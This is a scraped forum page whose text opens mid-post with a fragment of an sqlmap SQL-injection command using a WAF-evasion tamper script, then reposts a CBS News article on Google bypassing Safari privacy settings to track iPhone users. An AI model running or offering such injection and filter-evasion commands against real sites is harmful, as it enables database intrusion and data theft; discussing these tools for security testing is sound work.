–dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py” Figure 1: space2morehash.py tamper script in action via websec.ca Read this whole blog, tamper scripts win. Sursa: SQLMap Tamper Scripts Security Aegis
  25. Nytro
    [h=1]Google under fire over secretly tracking users By John Blackstone [/h] (CBS News) Some members of Congress are calling for an investigation of Google, after word came out the company has been tracking iPhone users all over the Internet -- even users who thought they blocked that kind of surveillance CBS News correspondent John Blackstone spoke with the man who uncovered what Google was doing. Stanford University grad student Jonathan Meyer was doing research on Internet privacy, when he discovered the computer code that let Google bypass user privacy settings. "The list just goes on and on," said Meyer. "If you went to these sites and thought you were there privately, you weren't?" asked Blackstone. "That's right," he said. Google tracked iPhone users by cheating Safari Most iPhone and iPad users access the Internet through Apple's Safari browser, which automatically sets up a barrier to keep out tracking programs from third-party advertisers. Google found a way to secretly get through that barrier, letting the advertisers flow in and tracking information flow out. "The technology we were looking at involves taking what Google learned through organizing your information, and using that to enrich their advertising content on non-Google websites," said Meyer. Blackstone posed a question: "Google's slogan: 'Do no evil.' Is this evil? "I think it raises question about evil," said Meyer. "I hesitate to give a bright line response on the evil or not. I think if evil includes negligence and gross negligence, then this is evil." In a statement, Google insists the tracking codes it planted "do not collect personal information." And that it "didn't anticipate this would happen" when it made changes to improve access to Google features on Safari. Tracking user on-line habits is the most valuable information Internet companies and advertisers can get. John Simpson, a consumer advocate, said user preferences and information are what Google is selling. "Don't think of yourself as Google's customer, you are Google's product," he said. Blackstone asked Meyer when he goes online, does he turn the privacy settings up full? "For sure," Meyer replied. "I think it's pretty absurd. You shouldn't need a Ph.D. in computer science to protect yourself." Meyer said his research at Stanford University shows that what we used to call spyware is now become standard business practice on the Internet. Also, Google said it has removed the code that created that privacy loophole. Sursa: Google under fire over secretly tracking users - CBS News
×
×
  • Create New...